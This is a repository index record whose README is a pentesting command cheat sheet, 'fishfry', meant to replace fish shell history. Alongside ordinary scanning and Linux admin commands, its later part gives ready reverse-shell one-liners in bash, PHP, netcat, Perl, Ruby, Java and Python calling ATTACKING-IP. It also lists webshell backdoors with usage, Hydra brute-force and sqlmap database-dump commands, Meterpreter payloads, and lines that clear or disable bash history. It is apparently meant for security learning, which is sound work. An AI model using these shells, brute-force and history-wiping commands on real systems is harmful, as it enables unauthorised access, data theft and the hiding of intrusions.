{"id":13563323,"url":"https://github.com/LubuntuFu/fishfry","last_synced_at":"2025-04-03T19:32:49.227Z","repository":{"id":215876576,"uuid":"62364520","full_name":"LubuntuFu/fishfry","owner":"LubuntuFu","description":"replaces fish history with a history tailored to pentesters for efficency and newbie pentesters for learning. this is also useful for begginer linux users as i have included descriptions of the file structure and basic commands, also includes commands for several different distro's.","archived":false,"fork":false,"pushed_at":"2016-07-04T05:52:19.000Z","size":56,"stargazers_count":51,"open_issues_count":1,"forks_count":3,"subscribers_count":9,"default_branch":"master","last_synced_at":"2024-11-04T15:52:35.298Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/LubuntuFu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-07-01T05:11:59.000Z","updated_at":"2024-09-01T15:41:39.000Z","dependencies_parsed_at":null,"dependency_job_id":"41659af8-ab7e-4193-88b6-70ba4d4362f6","html_url":"https://github.com/LubuntuFu/fishfry","commit_stats":null,"previous_names":["lubuntufu/fishfry"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LubuntuFu%2Ffishfry","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LubuntuFu%2Ffishfry/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LubuntuFu%2Ffishfry/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LubuntuFu%2Ffishfry/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/LubuntuFu","download_url":"https://codeload.github.com/LubuntuFu/fishfry/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247065471,"owners_count":20877785,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T13:01:17.842Z","updated_at":"2025-04-03T19:32:48.817Z","avatar_url":"https://github.com/LubuntuFu.png","language":null,"readme":"# fishfry\nreplaces fish history with a history tailored to pentesters for efficency and newbie pentesters for learning, new linux users, and several distro specific commands over 250 total commands with full discriptions.\n\nreplace the stock fishshell history located at '~/.config/fish/fish_history' with '~/.config/fish/fish_history_pentesting_suite' - Ubuntu\n\nreplace the stock fishshell history located at '/root/.local/share/fish/fish_history' with '/root/fishfry/fish_history_pentesting_suite' - kali/debian\n\nspecial thanks to g0tmi1k, #vulhub, #kali-linux, /r/kalilinux\n\nfull listing and description of the commands:\n\n\n nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services'\n\n nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)\n\n nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)\n\n nmap -v -p 445 --script=smb-check-vulns--script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover\n\n ls /usr/share/nmap/scripts/* | grep ftp - Search nmap scripts for keywords\n\n nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain\n\n enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing\n\n nbtscan -v - Displays the nbtscan version\n\n nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host\n\n nbtscan -O file-name.txt target(s) - Sends output to a file\n\n nbtscan -H - Generate an HTTP header\n\n nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output\n\n nbtscan -V - Enable verbose mode\n\n nbtscan -n - Turns off this inverse name lookup, for hanging resolution\n\n nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query\n\n nbtscan -m - Include the MAC (aka \"Ethernet\") addresses in the response, which is already implied by the -f option.\n\n netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site\n\n nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain\n\n enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing\n\n python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc\n\n mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs\n\n mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)\n\n net use Z: \\\\win-server\\share password /user:domain\\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line\n\n apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares\n\n nc -v 192.168.1.1 25 - telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner\n\n nmpcheck -t 192.168.1.X -c public\n\n snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f \n\n snmpenum -t 192.168.1.X\n\n onesixtyone -c names -i hosts\n\n nslookup -\u003e set type=any -\u003e ls -d blah.com - Windows DNS zone transfer\n\n dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer\n\n dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml\n\n nikto -h 192.168.1.1 - Perform a nikto scan against target\n\n dirbuster - Configure via GUI, CLI input doesn't work most of the time\n\n tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap\n\n python /usr/share/doc/python-impacket-doc/examples\n\n /samrdump.py 192.168.XXX.XXX - Enumerate users from SMB\n\n ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB\n\n snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 | cut -d” “ -f4 - Enmerate users from SNMP\n\n python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX - Enmerate users from SNMP\n\n nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output\n\n /usr/share/wordlists - Kali word lists\n\n hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force\n\n hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force\n\n hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force\n\n John The Ripper - JTR\n\n john --wordlist=/usr/share/wordlists/rockyou.txt hashes - JTR password cracking\n\n john --format=descrypt --wordlist \n\n /usr/share/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist\n\n john --format=descrypt hash --show - JTR forced descrypt brute force cracking\n\n searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc\n\n site:exploit-db.com exploit kernel \u003c= 3 - Use google to search exploit-db.com for exploits\n\n grep -R \"W7\" /usr/share/metasploit-framework\n\n /modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit\n\n netstat -tulpn - Show Linux network ports with process ID's (PIDs)\n\n watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.\n\n lsof -i - Show established connections.\n\n macchanger -m MACADDR INTR - Change MAC address on KALI Linux.\n\n ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.\n\n ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.\n\n ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.\n\n ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.\n\n dig -x 192.168.1.1 - Dig reverse lookup on an IP address.\n\n host 192.168.1.1 - Reverse lookup on an IP address, in case dig is not installed.\n\n dig @192.168.2.2 domain.com -t AXFR - Perform a DNS zone transfer using dig.\n\n host -l domain.com nameserver - Perform a DNS zone transfer using host.\n\n nbtstat -A x.x.x.x - Get hostname for IP address.\n\n ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.\n\n tcpkill -9 host google.com - Blocks access to google.com from the host machine.\n\n echo \"1\" \u003e /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.\n\n echo \"8.8.8.8\" \u003e /etc/resolv.conf - Use Google DNS.\n\n whoami - Shows currently logged in user on Linux.\n\n id - Shows currently logged in user and groups for the user.\n\n last - Shows last logged in users.\n\n mount - Show mounted drives.\n\n df -h - Shows disk usage in human readable output.\n\n echo \"user:passwd\" | chpasswd - Reset password in one line.\n\n getent passwd - List users on Linux.\n\n strings /usr/local/bin/blah - Shows contents of none text files, e.g. whats in a binary.\n\n uname -ar - Shows running kernel version.\n\n PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.\n\n history - Show bash history, commands the user has entered previously.\n\n cat /etc/redhat-release - Shows Redhat / CentOS version number.\n\n rpm -qa - List all installed RPM's on an RPM based Linux distro.\n\n rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.\n\n yum update - Update all RPM packages with YUM, also shows whats out of date.\n\n yum update httpd - Update individual packages, in this example HTTPD (Apache).\n\n yum install package - Install a package using YUM.\n\n yum --exclude=package kernel* update - Exclude a package from being updates with YUM.\n\n yum remove package - Remove package with YUM.\n\n yum erase package - Remove package with YUM.\n\n yum list package - Lists info about yum package.\n\n yum provides httpd - What a packages does, e.g Apache HTTPD Server.\n\n yum info httpd - Shows package info, architecture, version etc.\n\n yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.\n\n yum deplist package - Shows deps for a package.\n\n yum list installed | more - List all installed packages.\n\n yum grouplist | more - Show all YUM groups.\n\n yum groupinstall 'Development Tools' - Install YUM group.\n\n cat /etc/debian_version - Shows Debian version number.\n\n cat /etc/*-release - Shows Ubuntu version number.\n\n dpkg -l - List all installed packages on Debian / .deb based Linux distro.\nLinux User Management\n\n useradd new-user - Creates a new Linux user.\n\n passwd username - Reset Linux user password, enter just passwd if you are root.\n\n deluser username - Remove a Linux user.\n\n unzip archive.zip - Extracts zip file on Linux.\n\n zipgrep *.txt archive.zip - Search inside a .zip archive.\n\n tar xf archive.tar - Extract tar file Linux.\n\n tar xvzf archive.tar.gz - Extract a tar.gz file Linux.\n\n tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.\n\n tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.\n\n gzip -d archive.gz - Extract a gzip file Linux.\n\n zcat archive.gz - Read a gz file Linux without decompressing.\n\n zless archive.gz - Same function as the less command for .gz archives.\n\n zgrep 'blah' /var/log/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.\n\n vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).\n\n upx -9 -o output.exe input.exe - UPX compress .exe file Linux.\n\n zip -r file.zip /dir/* - Creates a .zip file on Linux.\n\n tar cf archive.tar files - Creates a tar file on Linux.\n\n tar czf archive.tar.gz files - Creates a tar.gz file on Linux.\n\n tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.\n\n gzip file - Creates a file.gz file on Linux.\n\n df -h blah - Display size of file / dir Linux.\n\n diff file1 file2 - Compare / Show differences between two files on Linux.\n\n md5sum file - Generate MD5SUM Linux.\n\n md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.\n\n file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.\n\n dos2unix - Convert Windows line endings to Unix / Linux.\n\n base64 \u003c input-file \u003e output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.\n\n base64 -d \u003c input-file \u003e output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.\n\n touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.\n\n rm -rf - Remove files and directories without prompting for confirmation.\n\n $ smbmount //server/share /mnt/win -o user=username,password=password1 , smbclient -U user \\\\\\\\server\\\\share , $ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share\n\n init 6 - Reboot Linux from the command line.\n\n gcc -o output.c input.c - Compile C code.\n\n gcc -m32 -o output.c input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.\n\n unset HISTORYFILE - Disable bash history logging.\n\n rdesktop X.X.X.X - Connect to RDP server from Linux.\n\n kill -9 $$ - Kill current session.\n\n chown user:group blah - Change owner of file or dir.\n\n chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recersive chown.\n\n chmod 600 file - Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.\n\n Clear bash history - $ ssh user@X.X.X.X | cat /dev/null \u003e ~/.bash_history\n\n 777 rwxrwxrwx No restriction, global WRX any user can do anything.\n\n 755 rwxr-xr-x Owner has full access, others can read and execute the file.\n\n 700 rwx------ Owner has full access, no one else has access.\n\n 666 rw-rw-rw- All users can read and write but not execute.\n\n 644 rw-r--r-- Owner can read and write, everyone else can read.\n\n 600 rw------- Owner can read and write, everyone else has no access.\n\n / - also know as \"slash\" or the root.\n\n /bin - Common programs, shared by the system, the system administrator and the users.\n\n /boot - Boot files, boot loader (grub), kernels, vmlinuz\n\n /dev - Contains references to system devices, files with special properties.\n\n /etc - Important system config files.\n\n /home - Home directories for system users.\n\n /lib - Library files, includes files for all kinds of programs needed by the system and the users.\n\n /lost+found - Files that were saved during failures are here.\n\n /mnt - Standard mount point for external file systems.\n\n /media - Mount point for external file systems (on some distros).\n\n /net - Standard mount point for entire remote file systems - nfs.\n\n /opt - Typically contains extra and third party software.\n\n /proc - A virtual file system containing information about system resources.\n\n /root - root users home dir.\n\n /sbin - Programs for use by the system and the system administrator.\n\n /tmp - Temporary space for use by the system, cleaned upon reboot.\n\n /usr -Programs, libraries, documentation etc. for all user-related programs.\n\n /var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.\n\n /etc/passwd - Contains local Linux users.\n\n /etc/shadow - Contains local account password hashes. \n\n /etc/group - Contains local account groups.\n\n /etc/init.d/ - Contains service init script - worth a look to see whats installed. \n\n /etc/hostname - System hostname. \n\n /etc/network/interfaces - Network interfaces. \n\n /etc/resolv.conf - System DNS servers. \n\n /etc/profile - System environment variables. \n\n ~/.ssh/ - SSH keys.\n\n ~/.bash_history - Users bash history log.\n\n /var/log/ - Linux system log files are typically stored here. \n\n /var/adm/ - UNIX system log files are typically stored here.\n\n /var/log/apache2/access.log \u0026 /var/log/httpd/access.log - Apache access log file typical path.\n\n /etc/fstab - File system mounts. \n\n gcc -o exploit exploit.c - Basic GCC compile\n\n gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux\n\n i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux\n\n gcc -o suid suid.c\n\n gcc -m32 -o suid suid.c - for 32bit\n\n root@kali:~# nc -nvlp 80 , nc: listening on :: 80 ... , nc: listening on 0.0.0.0 80 ...\n\n exec /bin/bash 0\u00260 2\u003e\u00260 , 0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/ATTACKING-IP/80; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196 , exec 5\u003c\u003e/dev/tcp/ATTACKING-IP/80 , cat \u003c\u00265 | while read line; do $line 2\u003e\u00265 \u003e\u00265; done , # or: , while read line 0\u003c\u00265; do $line 2\u003e\u00265 \u003e\u00265; done , bash -i \u003e\u0026 /dev/tcp/ATTACKING-IP/80 0\u003e\u00261\n\n php -r '$sock=fsockopen(\"ATTACKING-IP\",80);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");' , (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)\n\n nc -e /bin/sh ATTACKING-IP 80 , /bin/sh | nc ATTACKING-IP 80 , rm -f /tmp/p; mknod /tmp/p p \u0026\u0026 nc ATTACKING-IP 4444 0/tmp/p\n\n rm -f /tmp/p; mknod /tmp/p p \u0026\u0026 telnet ATTACKING-IP 80 0/tmp/p , telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443\n\n perl -e 'use Socket;$i=\"ATTACKING-IP\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n\n perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"ATTACKING-IP:80\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);system$_ while\u003c\u003e;' , #perl -e 'use Socket;$i=\"ATTACKING-IP\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n\n ruby -rsocket -e'f=TCPSocket.open(\"ATTACKING-IP\",80).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\n\n r = Runtime.getRuntime() , p = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/ATTACKING-IP/80;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[]) , p.waitFor()\n\n python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKING-IP\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n /usr/share/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell\n\n /usr/share/webshells/php/php-findsock-shell.php\n\n /usr/share/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80\n\n /usr/share/webshells/php/simple-backdoor.php - PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd\n\n /usr/share/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.\n\n /usr/share/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell\n\n /usr/share/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd\n\n /usr/share/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell\n\n /usr/share/webshells/asp/ - Kali ASP Shells\n\n /usr/share/webshells/aspx/ - Kali ASPX Shells\n\n /usr/share/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell\n\n Python TTY Shell Trick - python -c 'import pty;pty.spawn(\"/bin/bash\")' - echo os.system('/bin/bash')\n\n Spawn Interactive sh shell - /bin/sh -i\n\n Spawn Perl TTY Shell - exec \"/bin/sh\"; perl —e 'exec \"/bin/sh\";'\n\n Spawn Ruby TTY Shell - exec \"/bin/sh\"\n\n Spawn Lua TTY Shell - os.execute('/bin/sh')\n\n Run shell commands from vi: - :!bash\n\n Spawn TTY Shell NMAP - !sh\n\n ssh -L 9999:10.0.2.2:445 user@192.168.2.250 - Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250\n\n ssh -D 127.0.0.1:9050 root@192.168.2.250 - Dynamically allows all port forwards to the subnets availble on the target.\n\n set payload windows/meterpreter/reverse_tcp - Windows reverse tcp payload\n\n set payload windows/vncinject/reverse_tcp\n\n set ViewOnly false - Meterpreter Windows VNC Payload\n\n set payload linux/meterpreter/reverse_tcp - Meterpreter Linux Reverse Payload\n\n MD5 Hash Length - 16 Bytes\n\n SHA-1 Hash Length - 20 Bytes\n\n SHA-256 Hash Length - 32 Bytes\n\n SHA-512 Hash Length - 64 Bytes\n\n sqlmap -u http://meh.com --forms --batch --crawl=10--cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan\n\n sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read=\"/var/www/blah.php\" - Targeted sqlmap scan\n\n sqlmap -u \"http://meh.com/meh.php?id=1\"--dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump\n\n sqlmap -o -u \"http://meh.com/form/\" --forms - sqlmap check form for injection\n\n sqlmap -o -u \"http://meh/vuln-form\" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","funding_links":[],"categories":["Command Line Utilities"],"sub_categories":["Tools","Others"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FLubuntuFu%2Ffishfry","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FLubuntuFu%2Ffishfry","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FLubuntuFu%2Ffishfry/lists"}